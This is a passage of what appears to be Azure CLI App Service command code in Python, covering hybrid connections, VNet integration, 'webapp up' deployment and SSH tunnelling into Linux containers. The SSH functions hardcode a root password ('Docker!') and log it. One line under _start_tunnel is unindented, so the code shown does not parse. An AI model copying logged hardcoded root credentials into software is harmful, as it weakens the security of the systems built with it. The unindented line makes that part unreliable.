    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
        return web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
    return web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a triggered WebJob from the app (or the given slot)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    return web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
    """List hybrid connections on the app (or slot), pruned to useful fields.

    Linux apps are not supported: a warning is logged and None is returned.
    """
    linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
    if linux_webapp.reserved:
        return logger.warning("hybrid connections not supported on a linux app.")

    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
    else:
        listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)

    # Reformat each connection, keeping only the fields callers care about.
    mod_list = []
    for conn in listed_vals.additional_properties["value"]:
        props = conn["properties"]
        mod_list.append({
            "id": conn["id"],
            "location": conn["location"],
            "name": conn["name"],
            "properties": {
                "hostname": props["hostname"],
                "port": props["port"],
                "relayArmUri": props["relayArmUri"],
                "relayName": props["relayName"],
                "serviceBusNamespace": props["serviceBusNamespace"],
                "serviceBusSuffix": props["serviceBusSuffix"]
            },
            # Segment 4 of an ARM resource ID is the resource group name.
            "resourceGroup": conn["id"].split("/")[4],
            "type": conn["type"]
        })
    return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
    """Attach an existing Relay hybrid connection to the app (or slot).

    Looks up the relay, guarantees a 'defaultSender' send rule exists, then
    configures the app with the relay's endpoint and sender key. Returns the
    new connection pruned to its interesting fields. Linux apps are not
    supported: a warning is logged and None is returned.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
    is_linux = linux_webapp.reserved
    if is_linux:
        return logger.warning("hybrid connections not supported on a linux app.")

    web_client = web_client_factory(cmd.cli_ctx)
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)

    # Find the resource ID of the requested Relay namespace.
    hy_co_id = ''
    for n in namespace_client.list():
        if n.name == namespace:
            hy_co_id = n.id

    # Walk the ID segments to extract the namespace's resource group
    # (the segment immediately after "resourceGroups").
    i = 0
    hy_co_resource_group = ''
    hy_co_split = hy_co_id.split("/")
    for z in hy_co_split:
        if z == "resourceGroups":
            hy_co_resource_group = hy_co_split[i + 1]
        i = i + 1

    # calling the relay API to get information about the hybrid connection
    hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)

    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)

    hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
    hy_co_info = hy_co.id
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    # NOTE(review): assumes the relay metadata always carries an 'endpoint'
    # entry of the form 'host:port' — the .split(":") below fails otherwise.
    hy_co_hostname = ''
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]
    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    # NOTE(review): segment 8 of the relay's ARM ID is presumably the namespace
    # name — confirm against the Relay resource ID layout.
    id_parameters = hy_co_info.split("/")

    # populate object with information from the hybrid connection, and set it
    # on webapp
    hc = HybridConnection(service_bus_namespace=id_parameters[8],
                          relay_name=hybrid_connection,
                          relay_arm_uri=hy_co_info,
                          hostname=hostname,
                          port=port,
                          send_key_name="defaultSender",
                          send_key_value=hy_co_keys.primary_key,
                          service_bus_suffix=".servicebus.windows.net")
    if slot is None:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
                                                                           hybrid_connection, hc)
    else:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
                                                                                hybrid_connection, hc, slot)

    # reformats hybrid connection, to prune unnecessary fields
    resourceGroup = return_hc.id.split("/")
    mod_hc = {
        "hostname": return_hc.hostname,
        "id": return_hc.id,
        "location": return_hc.additional_properties["location"],
        "name": return_hc.name,
        "port": return_hc.port,
        "relayArmUri": return_hc.relay_arm_uri,
        "resourceGroup": resourceGroup[4],
        "serviceBusNamespace": return_hc.service_bus_namespace,
        "serviceBusSuffix": return_hc.service_bus_suffix
    }
    return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
    """Switch every app on *plan* that uses the hybrid connection to the
    relay's primary or secondary key.

    :param key_type: 'primary' or 'secondary' (case-insensitive); anything
        else logs a warning and aborts.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    web_client = web_client_factory(cmd.cli_ctx)

    # extract the hybrid connection resource group
    asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
                                                                   namespace, hybrid_connection)
    arm_uri = asp_hy_co.relay_arm_uri
    split_uri = arm_uri.split("resourceGroups/")
    resource_group_strings = split_uri[1].split('/')
    relay_resource_group = resource_group_strings[0]

    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # calling the relay function to obtain information about the hc in question
    hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)

    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)

    hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    # NOTE(review): initialized to 0 and only replaced when an 'endpoint'
    # metadata entry exists — .split(":") below fails otherwise. Assumes the
    # endpoint is 'host:port'.
    hy_co_hostname = 0
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]
    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    key = "empty"
    if key_type.lower() == "primary":
        key = hy_co_keys.primary_key
    elif key_type.lower() == "secondary":
        key = hy_co_keys.secondary_key
    # ensures input is correct
    if key == "empty":
        logger.warning("Key type is invalid - must be primary or secondary")
        return

    apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
                                                                           hybrid_connection)
    # changes the key for every app that uses that hybrid connection
    for x in apps:
        app_info = ast.literal_eval(x)
        app_name = app_info["name"]
        app_id = app_info["id"]
        id_split = app_id.split("/")
        # Segment 4 of an ARM resource ID is the resource group name.
        app_resource_group = id_split[4]
        hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
                              relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
                              send_key_value=key)
        web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
                                                     hybrid_connection, hc)

    return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
                                                                           namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
    """List virtual-network connections of an App Service plan."""
    return web_client_factory(cmd.cli_ctx).app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
    """Remove a hybrid connection from the app (or the given slot).

    Linux apps are not supported: a warning is logged and None is returned.
    """
    linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
    if linux_webapp.reserved:
        return logger.warning("hybrid connections not supported on a linux app.")

    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot is None:
        return web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
    return web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
                                                  hybrid_connection, slot)
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
    """List the app's (or slot's) VNet integrations, with the GUID prefix
    stripped from names/ids and only the useful fields kept."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
    else:
        result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))

    mod_list = []
    for vnet in result:
        # Names look like '<guid>_<vnetname>'; drop everything up to the first '_'.
        long_name = vnet.name
        short_name = long_name.split('_', 1)[1] if '_' in long_name else long_name
        vnet_id = vnet.id
        short_id = vnet_id[:vnet_id.rindex('/')] + '/' + short_name
        mod_list.append({
            "certThumbprint": vnet.cert_thumbprint,
            "id": short_id,
            "location": vnet.additional_properties["location"],
            "name": short_name,
            # Segment 4 of an ARM resource ID is the resource group name.
            "resourceGroup": vnet_id.split('/')[4],
            "routes": vnet.routes,
            "type": vnet.type,
            "vnetResourceId": vnet.vnet_resource_id
        })
    return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
    """Integrate the app (or slot) with a subnet via a Swift virtual-network
    connection, delegating the subnet to Microsoft.Web/serverFarms if needed.

    *vnet* may be a vnet name or a full resource ID. Returns the connection
    pruned to its interesting fields, or None (with a warning) when the vnet
    is not found or the plan cannot support the integration.
    """
    SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
    Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
    client = web_client_factory(cmd.cli_ctx)
    vnet_client = network_client_factory(cmd.cli_ctx)

    # Resolve *vnet* (name or resource ID) against every vnet in the subscription.
    list_all_vnets = vnet_client.virtual_networks.list_all()
    vnets = []
    for v in list_all_vnets:
        if vnet in (v.name, v.id):
            vnet_details = parse_resource_id(v.id)
            vnet_resource_group = vnet_details['resource_group']
            vnets.append((v.id, v.name, vnet_resource_group))
    if not vnets:
        return logger.warning("The virtual network %s was not found in the subscription.", vnet)

    # If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
    found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
    if not found_vnet:
        found_vnet = [vnets[0]]
    (vnet_id, vnet, vnet_resource_group) = found_vnet[0]
    if len(vnets) > 1:
        logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
                       "To use a different virtual network, specify the virtual network resource ID using --vnet.",
                       vnet, vnet_id)

    if slot is None:
        swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
    else:
        swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
                                                                                          name, slot)
    # check to see if the connection would be supported
    if swift_connection_info.swift_supported is not True:
        return logger.warning("""Your app must be in an Azure App Service deployment that is
              capable of scaling up to Premium v2\nLearn more:
              https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")

    subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
    delegations = subnetObj.delegations
    delegated = False
    for d in delegations:
        if d.service_name.lower() == "microsoft.web/serverfarms".lower():
            delegated = True
    if not delegated:
        # Delegate the subnet to App Service before connecting.
        subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
        vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
                                             subnet_parameters=subnetObj)

    id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
    subnet_resource_id = id_subnet.id
    swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
                                    swift_supported=True)
    if slot is None:
        return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
                                                                                        swiftVnet)
    else:
        return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
                                                                                             swiftVnet, slot)
    # reformats the vnet entry, removing unecessary information
    id_strings = return_vnet.id.split('/')
    # Segment 4 of an ARM resource ID is the resource group name.
    resourceGroup = id_strings[4]
    mod_vnet = {
        "id": return_vnet.id,
        "location": return_vnet.additional_properties["location"],
        "name": return_vnet.name,
        "resourceGroup": resourceGroup,
        "subnetResourceId": return_vnet.subnet_resource_id
    }
    return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
    """Delete the app's (or the given slot's) Swift virtual-network connection."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot is None:
        return web_apps.delete_swift_virtual_network(resource_group_name, name)
    return web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """List the run history of a triggered WebJob on the app (or the given slot)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
    return web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False,  # pylint: disable=too-many-statements,
              launch_browser=False, html=False):
    """Create (or reuse) the resource group, App Service plan and web app for
    the code in the current directory, then zip-deploy the contents.

    Fix: the "OS mismatch" error previously interpolated the `os` MODULE
    (imported below) instead of the detected `os_name`, producing
    "<module 'os' ...>" in a user-facing message.
    """
    import os
    AppServicePlan = cmd.get_models('AppServicePlan')
    src_dir = os.getcwd()
    _src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
    client = web_client_factory(cmd.cli_ctx)
    user = get_profile_username()
    _create_new_rg = False
    _site_availability = get_site_availability(cmd, name)
    _create_new_app = _site_availability.name_available
    os_name = detect_os_form_src(src_dir, html)
    lang_details = get_lang_from_content(src_dir, html)
    language = lang_details.get('language')
    # detect the version
    data = get_runtime_version_details(lang_details.get('file_loc'), language)
    version_used_create = data.get('to_create')
    detected_version = data.get('detected')
    runtime_version = "{}|{}".format(language, version_used_create) if \
        version_used_create != "-" else version_used_create
    site_config = None
    if not _create_new_app:  # App exists, or App name unavailable
        if _site_availability.reason == 'Invalid':
            raise CLIError(_site_availability.message)
        # Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
        logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
                           "is a part of the current subscription".format(name))
        current_rg = app_details.resource_group
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.". format(name, current_rg, resource_group_name))
        rg_name = resource_group_name or current_rg
        if location is None:
            loc = app_details.location.replace(" ", "").lower()
        else:
            loc = location.replace(" ", "").lower()
        plan_details = parse_resource_id(app_details.server_farm_id)
        current_plan = plan_details['name']
        if plan is not None and current_plan.lower() != plan.lower():
            raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
                           "Please check if you have configured defaults for plan name and re-run command."
                           .format(plan, current_plan))
        plan = plan or plan_details['name']
        plan_info = client.app_service_plans.get(rg_name, plan)
        sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
        current_os = 'Linux' if plan_info.reserved else 'Windows'
        # Raise error if the existing app's OS differs from the detected one.
        if current_os.lower() != os_name.lower():
            # BUGFIX: interpolate the detected OS name, not the `os` module.
            raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
                           "'{}'. "
                           "Please create a new app to continue this operation.".format(name, current_os, src_dir,
                                                                                        os_name))
        _is_linux = plan_info.reserved
        # for an existing app check if the runtime version needs to be updated
        # Get site config to check the runtime version
        site_config = client.web_apps.get_configuration(rg_name, name)
    else:  # need to create new app, check if we need to use default RG or use user entered values
        logger.warning("The webapp '%s' doesn't exist", name)
        sku = get_sku_to_use(src_dir, html, sku)
        loc = set_location(cmd, sku, location)
        rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
        _is_linux = os_name.lower() == 'linux'
        _create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
        plan = get_plan_to_use(cmd=cmd,
                               user=user,
                               os_name=os_name,
                               loc=loc,
                               sku=sku,
                               create_rg=_create_new_rg,
                               resource_group_name=rg_name,
                               plan=plan)
    dry_run_str = r""" {
        "name" : "%s",
        "appserviceplan" : "%s",
        "resourcegroup" : "%s",
        "sku": "%s",
        "os": "%s",
        "location" : "%s",
        "src_path" : "%s",
        "runtime_version_detected": "%s",
        "runtime_version": "%s"
        }
        """ % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
               runtime_version)
    create_json = json.loads(dry_run_str)
    if dryrun:
        logger.warning("Web app will be created with the below configuration,re-run command "
                       "without the --dryrun flag to create & deploy a new app")
        return create_json

    if _create_new_rg:
        logger.warning("Creating Resource group '%s' ...", rg_name)
        create_resource_group(cmd, rg_name, loc)
        logger.warning("Resource group creation complete")
    # create ASP
    logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
    # updated we update those
    create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
                            number_of_workers=1 if _is_linux else None, location=loc)
    if _create_new_app:
        logger.warning("Creating webapp '%s' ...", name)
        create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None,
                      using_webapp_up=True, language=language)
        _configure_default_logging(cmd, rg_name, name)
    else:  # for existing app if we might need to update the stack runtime settings
        if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
            logger.warning('Updating runtime version from %s to %s',
                           site_config.linux_fx_version, runtime_version)
            update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
        elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
            logger.warning('Updating runtime version from %s to %s',
                           site_config.windows_fx_version, runtime_version)
            update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
        create_json['runtime_version'] = runtime_version
    # Zip contents & Deploy
    logger.warning("Creating zip with contents of dir %s ...", src_dir)
    # zip contents & deploy
    zip_file_path = zip_contents_from_dir(src_dir, language)
    enable_zip_deploy(cmd, rg_name, name, zip_file_path)
    # Remove the file after deployment, handling exception if user removed the file manually
    try:
        os.remove(zip_file_path)
    except OSError:
        pass

    if launch_browser:
        logger.warning("Launching app using default browser")
        view_in_browser(cmd, rg_name, name, None, logs)
    else:
        _url = _get_url(cmd, rg_name, name)
        logger.warning("You can launch the app at %s", _url)
        create_json.update({'URL': _url})
    if logs:
        _configure_default_logging(cmd, rg_name, name)
        return get_streaming_log(cmd, rg_name, name)
    with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
        cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
        cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
        cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
        cmd.cli_ctx.config.set_value('defaults', 'location', loc)
        cmd.cli_ctx.config.set_value('defaults', 'web', name)
    return create_json
def _ping_scm_site(cmd, resource_group, name, instance=None):
    """Wake up the Kudu (SCM) site by issuing a simple authenticated GET.

    Works around timeout limits seen on Linux; an ARRAffinity cookie pins the
    request to a specific *instance* when one is given.
    """
    import urllib3
    import requests
    from azure.cli.core.util import should_disable_connection_verify

    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
    scm_url = _get_scm_url(cmd, resource_group, name)
    authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
    cookies = {'ARRAffinity': instance} if instance is not None else {}
    requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
                 cookies=cookies)
def is_webapp_up(tunnel_server):
    """Ask the tunnel server whether the remote web app is reachable."""
    return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
    """Build (but do not start) a TunnelServer to the app's SCM endpoint.

    Only Linux apps are supported; raises CLIError for Windows plans or when
    an unknown *instance* name is supplied.
    """
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    if not webapp.reserved:
        raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")

    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    profile_user_name = next(p['userName'] for p in profiles)
    profile_user_password = next(p['userPWD'] for p in profiles)

    if port is None:
        port = 0  # Will auto-select a free port from 1024-65535
        logger.info('No port defined, creating on random free port')

    # Validate that we have a known instance (case-sensitive)
    if instance is not None:
        known_instances = set(i.name for i in list_instances(cmd, resource_group_name, name, slot=slot))
        if instance not in known_instances:
            if slot is not None:
                raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
            raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))

    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
    _ping_scm_site(cmd, resource_group_name, name, instance=instance)
    _wait_for_webapp(tunnel_server)
    return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open a background tunnel to the app's SCM site and block until done.

    :param port: local port to listen on (auto-selected when None).
    :param timeout: seconds to keep the tunnel open; blocks until Ctrl+C when None.
    :param instance: optional scale-out instance name to pin the tunnel to.
    """
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
    t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    t.daemon = True  # don't keep the CLI process alive after the user exits
    t.start()
    logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.remote_debugging_enabled:
        logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
    else:
        ssh_user_name = 'root'
        ssh_user_password = 'Docker!'
        logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
    logger.warning('Ctrl + C to close')

    if timeout:
        time.sleep(int(timeout))
    else:
        # Fix: Thread.isAlive() was removed in Python 3.9; use is_alive().
        while t.is_alive():
            time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open a tunnel and attach an interactive SSH session over it.

    Blocks for *timeout* seconds when given, otherwise until either the SSH
    session thread or the tunnel thread exits.
    """
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
    t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    t.daemon = True
    t.start()

    ssh_user_name = 'root'
    ssh_user_password = 'Docker!'

    s = threading.Thread(target=_start_ssh_session,
                         args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
    s.daemon = True
    s.start()

    if timeout:
        time.sleep(int(timeout))
    else:
        # Fix: Thread.isAlive() was removed in Python 3.9; use is_alive().
        while s.is_alive() and t.is_alive():
            time.sleep(5)
def _wait_for_webapp(tunnel_server):
    """Poll until the webapp answers; give up with a CLIError after 60 tries."""
    attempt = 0
    while not is_webapp_up(tunnel_server):
        if attempt == 0:
            logger.warning('Connection is not ready yet, please wait')
        if attempt == 60:
            raise CLIError('SSH timeout, your app must be running before'
                           ' it can accept SSH connections. '
                           'Use `az webapp log tail` to review the app startup logs.')
        attempt = attempt + 1
        logger.warning('.')
        time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
    """Open an interactive SSH session via fabric, retrying connect up to 60 times."""
    attempts = 0
    while True:
        try:
            conn = Connection(host=hostname,
                              port=port,
                              user=username,
                              # connect_timeout=60*10,
                              connect_kwargs={"password": password})
            break
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            if attempts == 0:
                logger.warning('Connection is not ready yet, please wait')
            if attempts == 60:
                raise CLIError("Timeout Error, Unable to establish a connection")
            attempts = attempts + 1
            logger.warning('.')
            time.sleep(1)
    try:
        # Print the MOTD, then hand the user a login shell on the container.
        conn.run('cat /etc/motd', pty=True)
        conn.run('source /etc/profile; exec $SHELL -l', pty=True)
    except Exception as ex:  # pylint: disable=broad-except
        logger.info(ex)
    finally:
        conn.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):  # pylint: disable=too-many-statements
    """Open an interactive SSH session into a Linux webapp container."""
    import platform
    if platform.system() == "Windows":
        raise CLIError('webapp ssh is only supported on linux and mac')

    if get_site_configs(cmd, resource_group_name, name, slot).remote_debugging_enabled:
        raise CLIError('remote debugging is enabled, please disable')

    create_tunnel_and_session(
        cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
        cmd,
        functionapp_name=None,
        organization_name=None,
        project_name=None,
        repository_name=None,
        overwrite_yaml=None,
        allow_force_push=None,
        github_pat=None,
        github_repository=None
):
    """Interactively create an Azure DevOps build pipeline for a function app."""
    from .azure_devops_build_interactive import AzureDevopsBuildInteractive
    builder = AzureDevopsBuildInteractive(
        cmd, logger, functionapp_name, organization_name, project_name,
        repository_name, overwrite_yaml, allow_force_push, github_pat,
        github_repository)
    return builder.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
    """Turn on application + filesystem web-server + docker container logging."""
    logger.warning("Configuring default logging for the app, if not already enabled")
    return config_diagnostics(
        cmd, rg_name, name,
        application_logging=True,
        web_server_logging='filesystem',
        docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
    """Return a full ASE resource ID, expanding a bare ASE name when needed."""
    if is_valid_resource_id(ase):
        return ase

    from msrestazure.tools import resource_id
    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(
        subscription=get_subscription_id(cli_ctx),
        resource_group=resource_group_name,
        namespace='Microsoft.Web',
        type='hostingEnvironments',
        name=ase)
def _validate_asp_sku(app_service_environment, sku):
    """Reject SKU/ASE combinations App Service does not allow.

    Isolated SKUs (I1-I3) require an App Service Environment; any other SKU
    is rejected when an ASE is supplied.
    """
    is_isolated_sku = sku in ['I1', 'I2', 'I3']
    if is_isolated_sku and not app_service_environment:
        raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
                       "learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
    if not is_isolated_sku and app_service_environment:
        raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
                       "learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
    """Return a full Key Vault resource ID, expanding a bare vault name when needed."""
    if is_valid_resource_id(key_vault):
        return key_vault

    from msrestazure.tools import resource_id
    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(
        subscription=get_subscription_id(cli_ctx),
        resource_group=resource_group_name,
        namespace='Microsoft.KeyVault',
        type='vaults',
        name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
    """Return True when *hostname* has a binding with host_name_type 'Verified'."""
    bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_host_name_bindings', slot)
    found = False
    for binding in bindings:
        # Binding names come back as 'site/hostname'; compare the last segment.
        candidate = binding.name.split('/')[-1]
        if candidate.lower() == hostname and binding.host_name_type == 'Verified':
            found = True
    return found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
    """Create or update a host-level key on a function app.

    :param key_type: host key scope, passed straight through to the API.
    :param key_value: value to set; passed through as-is (may be None).
    :param slot: optional deployment slot name.
    """
    # pylint: disable=protected-access
    # NOTE(review): presumably this re-maps KeyInfo serialization so that
    # name/value are nested under 'properties.' in the request body, as the
    # endpoint expects — confirm against the SDK. It mutates the class
    # attribute globally, so it affects all later KeyInfo serialization.
    KeyInfo._attribute_map = {
        'name': {'key': 'properties.name', 'type': 'str'},
        'value': {'key': 'properties.value', 'type': 'str'},
    }
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
                                                                 name,
                                                                 key_type,
                                                                 key_name,
                                                                 slot,
                                                                 name1=key_name,
                                                                 value=key_value)
    return client.web_apps.create_or_update_host_secret(resource_group_name,
                                                        name,
                                                        key_type,
                                                        key_name,
                                                        name1=key_name,
                                                        value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
    """List host-level keys of a function app, or of a slot when given."""
    webapps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return webapps.list_host_keys_slot(resource_group_name, name, slot)
    return webapps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
    """Delete a host-level key from a function app and report the outcome.

    Fix: the slot branch previously fell through and issued the non-slot
    delete as well, discarding the slot result and deleting the key from
    the production app too.
    """
    client = web_client_factory(cmd.cli_ctx)
    if slot:
